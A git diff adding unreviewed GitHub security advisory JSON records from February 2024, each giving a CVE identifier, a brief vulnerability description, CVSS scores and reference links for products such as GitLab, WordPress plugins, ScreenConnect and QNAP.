a/advisories/unreviewed/2024/02/GHSA-4fr5-6ccq-75w2/GHSA-4fr5-6ccq-75w2.json b/advisories/unreviewed/2024/02/GHSA-4fr5-6ccq-75w2/GHSA-4fr5-6ccq-75w2.json new file mode 100644 index 0000000000000..992b65ca9ab12 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4fr5-6ccq-75w2/GHSA-4fr5-6ccq-75w2.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fr5-6ccq-75w2", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-08T00:32:19Z", + "aliases": [ + "CVE-2023-6736" + ], + "details": "An issue has been discovered in GitLab EE affecting all versions starting from 11.3 before 16.6.7, all versions starting from 16.7 before 16.7.5, all versions starting from 16.8 before 16.8.2. It was possible for an attacker to cause a client-side denial of service using malicious crafted content in the CODEOWNERS file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6736" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/2269023" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/435036" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T22:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4fvp-9cw7-vhmc/GHSA-4fvp-9cw7-vhmc.json b/advisories/unreviewed/2024/02/GHSA-4fvp-9cw7-vhmc/GHSA-4fvp-9cw7-vhmc.json new file mode 100644 index 0000000000000..29edda1bb4770 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4fvp-9cw7-vhmc/GHSA-4fvp-9cw7-vhmc.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fvp-9cw7-vhmc", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24846" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MightyThemes Mighty Addons for Elementor allows Reflected XSS.This issue affects Mighty Addons for Elementor: from n/a through 1.9.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24846" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/mighty-addons/wordpress-mighty-addons-for-elementor-plugin-1-9-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4fx5-qq2p-q4xp/GHSA-4fx5-qq2p-q4xp.json b/advisories/unreviewed/2024/02/GHSA-4fx5-qq2p-q4xp/GHSA-4fx5-qq2p-q4xp.json new file mode 100644 index 0000000000000..da96b25b5b043 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4fx5-qq2p-q4xp/GHSA-4fx5-qq2p-q4xp.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fx5-qq2p-q4xp", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-0977" + ], + "details": "The Timeline Widget For Elementor (Elementor Timeline, Vertical & Horizontal Timeline) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image URLs in the plugin's timeline widget in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, changes the slideshow type, and then changes it back to an image.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0977" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T08:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4g66-77gc-7f94/GHSA-4g66-77gc-7f94.json b/advisories/unreviewed/2024/02/GHSA-4g66-77gc-7f94/GHSA-4g66-77gc-7f94.json new file mode 100644 index 0000000000000..f17e21ce347de --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4g66-77gc-7f94/GHSA-4g66-77gc-7f94.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4g66-77gc-7f94", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-03T03:30:27Z", + "aliases": [ + "CVE-2023-31005" + ], + "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration. IBM X-Force ID: 254767.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31005" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254767" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4ghr-47h5-v2hf/GHSA-4ghr-47h5-v2hf.json b/advisories/unreviewed/2024/02/GHSA-4ghr-47h5-v2hf/GHSA-4ghr-47h5-v2hf.json new file mode 100644 index 0000000000000..e9afe0e66f89f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4ghr-47h5-v2hf/GHSA-4ghr-47h5-v2hf.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4ghr-47h5-v2hf", + "modified": "2024-02-07T15:30:47Z", + "published": "2024-02-02T00:31:25Z", + "aliases": [ + "CVE-2023-47257" + ], + "details": "ConnectWise ScreenConnect through 23.8.4 allows man-in-the-middle attackers to achieve remote code execution via crafted messages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47257" + }, + { + "type": "WEB", + "url": "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.8-security-fix" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4gv8-ph4v-rwjm/GHSA-4gv8-ph4v-rwjm.json b/advisories/unreviewed/2024/02/GHSA-4gv8-ph4v-rwjm/GHSA-4gv8-ph4v-rwjm.json new file mode 100644 index 0000000000000..7fa7ba6903185 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4gv8-ph4v-rwjm/GHSA-4gv8-ph4v-rwjm.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gv8-ph4v-rwjm", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20813" + ], + "details": "Out-of-bounds Write in padmd_vld_qtbl of libpadm.so prior to SMR Feb-2024 Release 1 allows local attacker to execute arbitrary code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20813" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4hrc-358r-qjm4/GHSA-4hrc-358r-qjm4.json b/advisories/unreviewed/2024/02/GHSA-4hrc-358r-qjm4/GHSA-4hrc-358r-qjm4.json new file mode 100644 index 0000000000000..f284652f1c12b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4hrc-358r-qjm4/GHSA-4hrc-358r-qjm4.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4hrc-358r-qjm4", + "modified": "2024-02-04T06:30:20Z", + "published": "2024-02-04T06:30:20Z", + "aliases": [ + "CVE-2015-10129" + ], + "details": "A vulnerability was found in planet-freo up to 20150116 and classified as problematic. Affected by this issue is some unknown functionality of the file admin/inc/auth.inc.php. The manipulation of the argument auth leads to incorrect comparison. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 6ad38c58a45642eb8c7844e2f272ef199f59550d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-252716.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10129" + }, + { + "type": "WEB", + "url": "https://github.com/samwilson/planet-freo/commit/6ad38c58a45642eb8c7844e2f272ef199f59550d" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252716" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252716" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-697" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T05:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4j4p-q978-922r/GHSA-4j4p-q978-922r.json b/advisories/unreviewed/2024/02/GHSA-4j4p-q978-922r/GHSA-4j4p-q978-922r.json new file mode 100644 index 0000000000000..b6b7c434bbab3 --- /dev/null 
+++ b/advisories/unreviewed/2024/02/GHSA-4j4p-q978-922r/GHSA-4j4p-q978-922r.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4j4p-q978-922r", + "modified": "2024-02-06T00:30:28Z", + "published": "2024-02-06T00:30:28Z", + "aliases": [ + "CVE-2023-47354" + ], + "details": "An issue in the PowerOffWidgetReceiver function of Super Reboot (Root) Recovery v1.0.3 allows attackers to arbitrarily reset or power off the device via a crafted intent", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47354" + }, + { + "type": "WEB", + "url": "https://github.com/actuator/com.bdrm.superreboot/blob/main/CWE-925.md" + }, + { + "type": "WEB", + "url": "https://play.google.com/store/apps/details?id=com.bdrm.superreboot" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4m5c-7v8f-8p2q/GHSA-4m5c-7v8f-8p2q.json b/advisories/unreviewed/2024/02/GHSA-4m5c-7v8f-8p2q/GHSA-4m5c-7v8f-8p2q.json new file mode 100644 index 0000000000000..78a1c062152e5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4m5c-7v8f-8p2q/GHSA-4m5c-7v8f-8p2q.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4m5c-7v8f-8p2q", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-22819" + ], + "details": "An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability. This issue affects My Cloud Home and My Cloud Home Duo: before 9.5.1-104; ibi: before 9.5.1-104; My Cloud OS 5: before 5.27.161.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22819" + }, + { + "type": "WEB", + "url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4mgq-44rj-x22r/GHSA-4mgq-44rj-x22r.json b/advisories/unreviewed/2024/02/GHSA-4mgq-44rj-x22r/GHSA-4mgq-44rj-x22r.json new file mode 100644 index 0000000000000..10eaa502afce9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4mgq-44rj-x22r/GHSA-4mgq-44rj-x22r.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mgq-44rj-x22r", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41273" + ], + "details": "A heap-based buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41273" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120", + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4qgw-xmfm-r629/GHSA-4qgw-xmfm-r629.json b/advisories/unreviewed/2024/02/GHSA-4qgw-xmfm-r629/GHSA-4qgw-xmfm-r629.json new file mode 100644 index 0000000000000..999233a01db3c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4qgw-xmfm-r629/GHSA-4qgw-xmfm-r629.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4qgw-xmfm-r629", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2024-22984" + ], + "details": "Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22984" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T20:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4qjq-wqw7-p79p/GHSA-4qjq-wqw7-p79p.json b/advisories/unreviewed/2024/02/GHSA-4qjq-wqw7-p79p/GHSA-4qjq-wqw7-p79p.json new file mode 100644 index 0000000000000..a5d030431254a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4qjq-wqw7-p79p/GHSA-4qjq-wqw7-p79p.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4qjq-wqw7-p79p", + "modified": "2024-02-03T03:30:28Z", + "published": "2024-02-03T03:30:28Z", + "aliases": [ + "CVE-2024-1200" + ], + "details": "A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /template/1/default/. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252698 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1200" + }, + { + "type": "WEB", + "url": "https://github.com/sweatxi/BugHub/blob/main/Nanchang%20Lanzhi%20Technology%20Co.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252698" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252698" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T02:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4rgm-786j-w9cc/GHSA-4rgm-786j-w9cc.json b/advisories/unreviewed/2024/02/GHSA-4rgm-786j-w9cc/GHSA-4rgm-786j-w9cc.json new file mode 100644 index 0000000000000..9fc8562495356 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4rgm-786j-w9cc/GHSA-4rgm-786j-w9cc.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rgm-786j-w9cc", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-1046" + ], + "details": "The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin 'reg-number-field' shortcode in all versions up to, and including, 4.14.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1046" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3030229/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7911c774-3fb0-4d6c-a847-101e5ad8637a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4v2m-666w-ffm3/GHSA-4v2m-666w-ffm3.json b/advisories/unreviewed/2024/02/GHSA-4v2m-666w-ffm3/GHSA-4v2m-666w-ffm3.json new file mode 100644 index 0000000000000..37cbf96cdff2c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4v2m-666w-ffm3/GHSA-4v2m-666w-ffm3.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4v2m-666w-ffm3", + "modified": "2024-02-05T18:31:37Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-0323" + ], + "details": "Use of a Broken or Risky Cryptographic Algorithm vulnerability in B&R Industrial Automation Automation Runtime (SDM modules).\n\n\n\nThe FTP server used on the B&R\nAutomation Runtime supports unsecure encryption mechanisms, such as SSLv3,\nTLSv1.0 and TLS1.1. An network-based attacker can exploit the flaws to conduct\nman-in-the-middle attacks or to decrypt communications between the affected product\nclients.  \n\nThis issue affects Automation Runtime: from 14.0 before 14.93.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0323" + }, + { + "type": "WEB", + "url": "https://www.br-automation.com/fileadmin/SA23P004_FTP_uses_unsecure_encryption_mechanisms-f57c147c.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T16:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4vg6-rrvh-fpmr/GHSA-4vg6-rrvh-fpmr.json b/advisories/unreviewed/2024/02/GHSA-4vg6-rrvh-fpmr/GHSA-4vg6-rrvh-fpmr.json new file mode 100644 index 0000000000000..f5b3ad6b72e1d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4vg6-rrvh-fpmr/GHSA-4vg6-rrvh-fpmr.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4vg6-rrvh-fpmr", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-24059" + ], + "details": "springboot-manager v1.6 is vulnerable to Arbitrary File Upload. The system does not filter the suffixes of uploaded files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24059" + }, + { + "type": "WEB", + "url": "https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#2-file-upload-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T14:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4vq7-3qhw-47p6/GHSA-4vq7-3qhw-47p6.json b/advisories/unreviewed/2024/02/GHSA-4vq7-3qhw-47p6/GHSA-4vq7-3qhw-47p6.json new file mode 100644 index 0000000000000..d45205ecf42e3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4vq7-3qhw-47p6/GHSA-4vq7-3qhw-47p6.json 
@@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4vq7-3qhw-47p6", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24215" + ], + "details": "An issue in the component /cgi-bin/GetJsonValue.cgi of Cellinx NVT Web Server 5.0.0.014 allows attackers to leak configuration information via a crafted POST request.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24215" + }, + { + "type": "WEB", + "url": "https://github.com/940198871/Vulnerability-details/blob/main/CVE-2024-24215" + }, + { + "type": "WEB", + "url": "https://reference3.example.com//1.222.228.4/%2C" + }, + { + "type": "WEB", + "url": "https://reference4.example.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4w35-3gj2-cc52/GHSA-4w35-3gj2-cc52.json b/advisories/unreviewed/2024/02/GHSA-4w35-3gj2-cc52/GHSA-4w35-3gj2-cc52.json new file mode 100644 index 0000000000000..7464849d96439 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4w35-3gj2-cc52/GHSA-4w35-3gj2-cc52.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4w35-3gj2-cc52", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-1260" + ], + "details": "A vulnerability classified as critical has been found in Juanpao JPShop up to 1.5.02. This affects the function actionIndex of the file /api/controllers/admin/app/ComboController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252999.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1260" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/H73DuWdyifaI" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252999" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252999" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4w42-hx2p-m2jw/GHSA-4w42-hx2p-m2jw.json b/advisories/unreviewed/2024/02/GHSA-4w42-hx2p-m2jw/GHSA-4w42-hx2p-m2jw.json new file mode 100644 index 0000000000000..225ecc07bd1ce --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4w42-hx2p-m2jw/GHSA-4w42-hx2p-m2jw.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4w42-hx2p-m2jw", + "modified": "2024-02-06T12:30:31Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-24938" + ], + "details": "In JetBrains TeamCity before 2023.11.2 limited directory traversal was possible in the Kotlin DSL documentation", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24938" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4x63-78pq-hqc9/GHSA-4x63-78pq-hqc9.json b/advisories/unreviewed/2024/02/GHSA-4x63-78pq-hqc9/GHSA-4x63-78pq-hqc9.json new file mode 100644 index 0000000000000..e752cd7380956 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4x63-78pq-hqc9/GHSA-4x63-78pq-hqc9.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4x63-78pq-hqc9", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2023-7077" + ], + "details": "Sharp NEC Displays (P403, P463, P553, P703, P801, X554UN, X464UN, X554UNS, X464UNV, X474HB, X464UNS, X554UNV, X555UNS, X555UNV, X754HB, X554HB, E705, E805, E905, UN551S, UN551VS, X551UHD, X651UHD, X841UHD, X981UHD, MD551C8) allows an attacker execute remote code by sending unintended parameters in http request.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7077" + }, + { + "type": "WEB", + "url": "https://www.sharp-nec-displays.com/global/support/info/A4_vulnerability.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4xm5-m6gw-q5w5/GHSA-4xm5-m6gw-q5w5.json 